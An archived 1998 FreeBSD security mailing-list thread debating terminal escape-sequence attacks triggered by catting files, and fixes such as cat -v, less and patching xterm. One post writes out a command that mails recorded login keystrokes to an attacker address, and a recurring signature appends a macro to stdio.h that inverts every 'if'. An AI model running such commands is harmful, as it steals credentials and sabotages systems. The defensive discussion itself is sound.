"feature". > - Jordan Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:03:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA25764 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:03:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gate.az.com ([206.63.203.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA25724 for ; Thu, 10 Sep 1998 14:03:10 -0700 (PDT) (envelope-from yankee@gate.az.com) Received: (from yankee@localhost) by gate.az.com (8.8.5/8.8.5) id OAA25189; Thu, 10 Sep 1998 14:02:54 -0700 (PDT) Date: Thu, 10 Sep 1998 14:02:54 -0700 (PDT) From: "Dan Seafeldt, AZ.COM System Administrator" To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A similar but different technique was used at a wa university computer center here in the 80's - A 'bomb' or sequences of escape codes imbedded in a routine sounding email message to the root console or staff console which which caused the terminals in the staff/admin offices to record certain keypresses as a macro string (specifically entry of login/password) then at the right time enter/playback something like this while sitting at a prompt: echo '...recorded keypresses...' > tmpfile sendmail hack@hackville.com < tmpfile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:04:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA25968 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:04:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-10.igrin.co.nz [202.49.245.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA25953 for ; Thu, 10 Sep 1998 14:04:51 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id JAA05560; Fri, 11 Sep 1998 09:01:04 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 09:01:04 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Karl Denninger cc: Garrett Wollman , Josef Karthauser , Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <19980910133615.A13227@Mcs.Net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Karl Denninger wrote: > On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote: > Actually, for VTxxx series terminals (and good emulators of them) as well as > most others, the problem is far worse. > > Most terminals can be made to display something, set the cursor to where the > "something" is, and then *send the line containing the something to the > host*. > > This allows ARBITRARY commands to be accidentially (read: maliciously) > executed by someone doing nothing more than displaying a file! > > This is an OLD trick, but one which still works, and if the person doing the > tricking is crafty it can be particularly dangerous. (Consider that most > termainls also have attributes such as "invisible" text available, and/or > that you can send the line, then back up again and overwrite it). > > I can craft a 40-50 byte sequence that will, if the file is "catted" as > root, give me an instant SUID root shell somewhere on the system that > you're very unlikely to find. Ouch. I'm surprised this doesn't come up more often. this means that the safety of using xterm is dependent on every program you might use protecting you against escape sequences which is never going to be the case. Are there any safe shell-in-a-window alternatives to xterm then? Someone mentioned a possible setting in xterm? Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:06:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA26242 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:06:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA26229 for ; Thu, 10 Sep 1998 14:06:34 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id OAA18175; Thu, 10 Sep 1998 14:03:44 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Aleph One cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 15:01:32 CDT." Date: Thu, 10 Sep 1998 14:03:44 -0700 Message-ID: <18171.905461424@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Whoa! If you dont know the contents of a file dont read it. If you dont > read a file you dont know its contents. Thats some really useful > suggestion. Only because you didn't actually read my message, you just fired off a knee-jerk response. Again, what I actually said was "don't blindly cat it to your screen" which is a perfectly valid point. If you want something which protects you, use more or less as many others have suggested. If you don't want something which protects you then why are we even having this discussion? Those who deliberately wish to inflict pain on themselves can find it in a wide variety of areas. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:07:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA26447 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:07:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA26423; Thu, 10 Sep 1998 14:07:26 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (enkhyl@hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id OAA17408; Thu, 10 Sep 1998 14:10:04 -0700 Date: Thu, 10 Sep 1998 14:10:03 -0700 (PDT) From: Enkhyl To: "David O'Brien" cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: <19980909195235.A4400@nuxi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, David O'Brien wrote: > > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > > see http://www.freebsd.org/auditors.html > and http://www.watson.org/fbsd-hardening/index.html I've looked at both. I think this project would be a subset of what the code auditors are doing, and it seems it would augment their work. Thanks for the references. -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:23:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA29708 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:23:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-10.igrin.co.nz [202.49.245.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA29700 for ; Thu, 10 Sep 1998 14:22:56 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id JAA05654; Fri, 11 Sep 1998 09:19:42 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 09:19:42 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Studded cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: terminal escape exploit (was Re: cat exploit) In-Reply-To: <35F818CA.8647A116@dal.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Studded wrote: > It seems to me that a lot of people missed the point of one of the > warnings that someone else posted in response actually. Don't use cat > routinely to view files. Use more, or better yet less since less doesn't > view binary files by default. It's not just cat that you've got to worry about. tail is another one. How many people routinely use 'tail -f' to monitor log info that includes potentially tainted content. The problem is not cat. It's xterm and other similar terminal programs. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:28:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA00786 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:28:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA00771 for ; Thu, 10 Sep 1998 14:28:42 -0700 (PDT) (envelope-from aleph1@dfw.net) Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id QAA13246; Thu, 10 Sep 1998 16:22:31 -0500 (CDT) Date: Thu, 10 Sep 1998 16:22:30 -0500 (CDT) From: Aleph One X-Sender: aleph1@dfw.nationwide.net To: Jared Mauch cc: "Jordan K. Hubbard" , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <19980910171918.E12040@puck.nether.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jared Mauch wrote: > > Whoa! If you dont know the contents of a file dont read it. If you dont > > read a file you dont know its contents. Thats some really useful > > suggestion. > > Silly rabbit, tricks are for kids. > > What you really need to do is using a modern file(1), or > more specifically file with a modern magic(5) file, you can determine > the best way to view it. Are you going to really use file(1) on every README file you find to try to determine if its dangerous? Will all your users to the same? What we need to fix is silly programs like xterm that process dangerous escape characters. > - jared > > -- > Jared Mauch | pgp key available via finger from jared@puck.nether.net > | http://puck.nether.net/~jared/ > Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:30:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA01141 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:30:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-010.dublin.indigo.ie [194.125.134.140]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA01107 for ; Thu, 10 Sep 1998 14:30:25 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01790; Thu, 10 Sep 1998 22:21:04 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199809102121.WAA01790@indigo.ie> Date: Thu, 10 Sep 1998 22:21:04 +0000 In-Reply-To: <35F818CA.8647A116@dal.net>; Studded Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Studded , Michael Richards <026809r@dragon.acadiau.ca> Subject: Re: cat exploit Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 10, 11:22am, Studded wrote: } Subject: Re: cat exploit > Michael Richards wrote: > > > > Hi. > > > > Is it just me or did everyone miss the point of Jay's message? > > It seems to me that a lot of people missed the point of one of the > warnings that someone else posted in response actually. Don't use cat > routinely to view files. Use more, or better yet less since less doesn't > view binary files by default. The "well don't do that then" response is not the correct solution to this problem. The issue is that the terminal emulator doesn't have an option to disable the features which are dangerous (which should be disabled by default). This is a subtle attack which can be prevented against in this way with far greater effectiveness than relying on the administrator/user to understand and remember the potential for exploitation present in seemly innocuous actions. Perhaps someone will now be prompted to make the necessary changes. :) Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:30:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA01172 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:30:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA01130 for ; Thu, 10 Sep 1998 14:30:36 -0700 (PDT) (envelope-from aleph1@dfw.net) Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id QAA13854; Thu, 10 Sep 1998 16:24:28 -0500 (CDT) Date: Thu, 10 Sep 1998 16:24:28 -0500 (CDT) From: Aleph One X-Sender: aleph1@dfw.nationwide.net To: "Jordan K. Hubbard" cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <18171.905461424@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jordan K. Hubbard wrote: > Only because you didn't actually read my message, you just fired off a > knee-jerk response. Again, what I actually said was "don't blindly > cat it to your screen" which is a perfectly valid point. If you want > something which protects you, use more or less as many others have > suggested. If you don't want something which protects you then why > are we even having this discussion? Those who deliberately wish to > inflict pain on themselves can find it in a wide variety of areas. Because its non-intuitive. How many end users are going to know that simply cat'ing a file is dangerous? More or less shouldnt protect me. xterm and rxvt should. > - Jordan > Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:34:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02167 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:34:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-010.dublin.indigo.ie [194.125.134.140]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02103 for ; Thu, 10 Sep 1998 14:34:10 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01807; Thu, 10 Sep 1998 22:24:53 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199809102124.WAA01807@indigo.ie> Date: Thu, 10 Sep 1998 22:24:53 +0000 In-Reply-To: <17574.905449550@time.cdrom.com>; "Jordan K. Hubbard" Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: "Jordan K. Hubbard" , 026809r@dragon.acadiau.ca (Michael Richards) Subject: Re: cat exploit Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 10, 10:45am, "Jordan K. Hubbard" wrote: } Subject: Re: cat exploit > > Is it just me or did everyone miss the point of Jay's message? > > Rather, it described a symtom common to most VT100 compliant terminal > emulators and something very clearly under the "well don't DO that then" > category. It's nothing new at all and if you're not sure of the > contents of a file, don't just blindly cat it to your screen. It might not be new, but it's certainly subtle and not well known. Lets imagine there were a buffer overflow in some editor which could be exploited by opening a file with a certain header and contents. If someone claimed this were dangerous would "well don't edit arbitrary files, look at them in less first" be an appropriate response? Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:44:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04253 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:44:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04238 for ; Thu, 10 Sep 1998 14:44:30 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0/8.7.3) id RAA12480; Thu, 10 Sep 1998 17:19:19 -0400 Message-ID: <19980910171918.E12040@puck.nether.net> Date: Thu, 10 Sep 1998 17:19:18 -0400 From: Jared Mauch To: Aleph One , "Jordan K. Hubbard" Cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit References: <17574.905449550@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Aleph One on Thu, Sep 10, 1998 at 03:01:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 03:01:32PM -0500, Aleph One wrote: > On Thu, 10 Sep 1998, Jordan K. Hubbard wrote: > > > The problem is that Jay's message didn't actually have a point. :) > > > > Rather, it described a symtom common to most VT100 compliant terminal > > emulators and something very clearly under the "well don't DO that then" > > category. It's nothing new at all and if you're not sure of the > > contents of a file, don't just blindly cat it to your screen. The > > same goes for any binary I might hand you - if I put up a file on > > an FTP site called ``megaspacewar.exe'' and you go and run it on your > > Windows box and it trojans you to death (or worse), who's fault is > > that? :-) Same basic issue. > > Whoa! If you dont know the contents of a file dont read it. If you dont > read a file you dont know its contents. Thats some really useful > suggestion. Silly rabbit, tricks are for kids. What you really need to do is using a modern file(1), or more specifically file with a modern magic(5) file, you can determine the best way to view it. About downloading something then executing it, that's a whole other can of worms, because in downloading it, you put it on your computer specifically, and if you run it not knowing what it is, you're asking for trouble (IMHO). If it's something from out of a box, talk to people about fixing the license under which software is distributed. See http://cnn.com/TECH/computing/9809/09/lawmakers.idg/ for a related story. Using more/less/view/vi/emacs/pico/od to view the file would be a much better choice than cat, or at least use cat -v | more. if you want a machine that makes it tougher to view a binary file, go buy a mac. - jared -- Jared Mauch | pgp key available via finger from jared@puck.nether.net | http://puck.nether.net/~jared/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:49:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA05232 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:49:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA05219 for ; Thu, 10 Sep 1998 14:49:28 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id OAA17647; Thu, 10 Sep 1998 14:44:22 -0700 (PDT) Message-Id: <3.0.5.32.19980910144756.01d24c70@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 10 Sep 1998 14:47:56 -0700 To: Aleph One From: Jamie Lawrence Subject: Re: cat exploit Cc: security@FreeBSD.ORG In-Reply-To: References: <17574.905449550@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:01 PM 9/10/98 -0500, Aleph One wrote: >> Rather, it described a symtom common to most VT100 compliant terminal >> emulators and something very clearly under the "well don't DO that then" >> category. It's nothing new at all and if you're not sure of the >> contents of a file, don't just blindly cat it to your screen. The >> same goes for any binary I might hand you - if I put up a file on >> an FTP site called ``megaspacewar.exe'' and you go and run it on your >> Windows box and it trojans you to death (or worse), who's fault is >> that? :-) Same basic issue. > >Whoa! If you dont know the contents of a file dont read it. If you dont >read a file you dont know its contents. Thats some really useful >suggestion. Aleph, you should know better. This 'problem' has been around for ages. Doing things that have been known to be dangerous for years as root is not something any Unix that I know of tries to protect against. >How about something more practical? Like being able to turn off this >"feature". "rm /bin/cat" Or, not cat'ing unknown files are root. Or as your own username, depending on your threat model. Or use a utility that strips control sequences. >> - Jordan > >Aleph One / aleph1@dfw.net -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:59:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA07873 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:59:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA07866 for ; Thu, 10 Sep 1998 14:59:27 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id OAA18340; Thu, 10 Sep 1998 14:56:40 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Aleph One cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 16:24:28 CDT." Date: Thu, 10 Sep 1998 14:56:40 -0700 Message-ID: <18336.905464600@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Because its non-intuitive. How many end users are going to know that > simply cat'ing a file is dangerous? More or less shouldnt protect me. > xterm and rxvt should. Fine, submit your patches to the XFree86 Project and the author of rxvt then. This discussion passed "tedious" in the road some time back and is now heading rapidly towards idiotic status. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:59:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA07908 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:59:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA07897 for ; Thu, 10 Sep 1998 14:59:32 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0/8.7.3) id RAA12666; Thu, 10 Sep 1998 17:34:19 -0400 Message-ID: <19980910173419.G12040@puck.nether.net> Date: Thu, 10 Sep 1998 17:34:19 -0400 From: Jared Mauch To: Aleph One Cc: "Jordan K. Hubbard" , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit References: <19980910171918.E12040@puck.nether.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Aleph One on Thu, Sep 10, 1998 at 04:22:30PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 04:22:30PM -0500, Aleph One wrote: > On Thu, 10 Sep 1998, Jared Mauch wrote: > > > > Whoa! If you dont know the contents of a file dont read it. If you dont > > > read a file you dont know its contents. Thats some really useful > > > suggestion. > > > > Silly rabbit, tricks are for kids. > > > > What you really need to do is using a modern file(1), or > > more specifically file with a modern magic(5) file, you can determine > > the best way to view it. > > Are you going to really use file(1) on every README file you find to try > to determine if its dangerous? Will all your users to the same? What we > need to fix is silly programs like xterm that process dangerous escape > characters. How are you going to do your terminal emulation then? if you always use cat -v, that will escape them. what's the problem? echo alias cat cat -v >> ~/.profile echo alias cat cat -v >> ~/.cshrc etc.. - jared To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 15:27:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA13903 for freebsd-security-outgoing; Thu, 10 Sep 1998 15:27:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA13898 for ; Thu, 10 Sep 1998 15:27:38 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id PAA18493; Thu, 10 Sep 1998 15:24:48 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: rotel@indigo.ie cc: Studded , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 22:21:04 -0000." <199809102121.WAA01790@indigo.ie> Date: Thu, 10 Sep 1998 15:24:48 -0700 Message-ID: <18489.905466288@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > to this problem. The issue is that the terminal emulator doesn't > have an option to disable the features which are dangerous (which > should be disabled by default). This is a subtle attack which can I think most people have gotten used to that fact over the 15+ years where actual terminals which did this were no less dangerous. I sure did. Geeze, the kids these days - no perspective at all! :-) > Perhaps someone will now be prompted to make the necessary changes. :) Somehow, I doubt it. This is the kind of issue which people are willing to whine about but seldom act upon. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 15:29:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA14308 for freebsd-security-outgoing; Thu, 10 Sep 1998 15:29:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shamash3.shamash.org (shamash3.shamash.org [207.244.122.42]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id PAA14303 for ; Thu, 10 Sep 1998 15:29:44 -0700 (PDT) (envelope-from k@yt.to) Received: (qmail 6690 invoked by uid 65544); 10 Sep 1998 22:29:47 -0000 Mail-Followup-To: security@FreeBSD.ORG Message-ID: <19980910182947.B176@yt.to> Date: Thu, 10 Sep 1998 18:29:47 -0400 From: Louis Theran To: security@FreeBSD.ORG Subject: Re: cat exploit References: <17574.905449550@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i In-Reply-To: ; from Aleph One on Thu, Sep 10, 1998 at 03:01:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 03:01:32PM -0500, Aleph One wrote: > > How about something more practical? Like being able to turn off this > "feature". cat -v ? ^L -- Louis Theran "Te occidere possunt, sed te edere non possunt nefas quo est." PGP welcome; key at: k-pgpkey@yt.to To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 15:31:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA14829 for freebsd-security-outgoing; Thu, 10 Sep 1998 15:31:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA14822 for ; Thu, 10 Sep 1998 15:31:22 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id PAA18852; Thu, 10 Sep 1998 15:26:55 -0700 (PDT) Message-Id: <3.0.5.32.19980910153036.00ce92a0@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 10 Sep 1998 15:30:36 -0700 To: Aleph One From: Jamie Lawrence Subject: Re: cat exploit Cc: security@FreeBSD.ORG In-Reply-To: References: <3.0.5.32.19980910144756.01d24c70@204.74.82.151> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [My last comment on the topic.] >The problem may be as old as unix itself. Nonetheless, it hasnt been >fixed. Fixing it in cat, by not using it or modiying it, is the wrong >solution. Nor is this a root only problem. You an I may know not to use >cat, but what about all your users? Nor is cat the only way to display 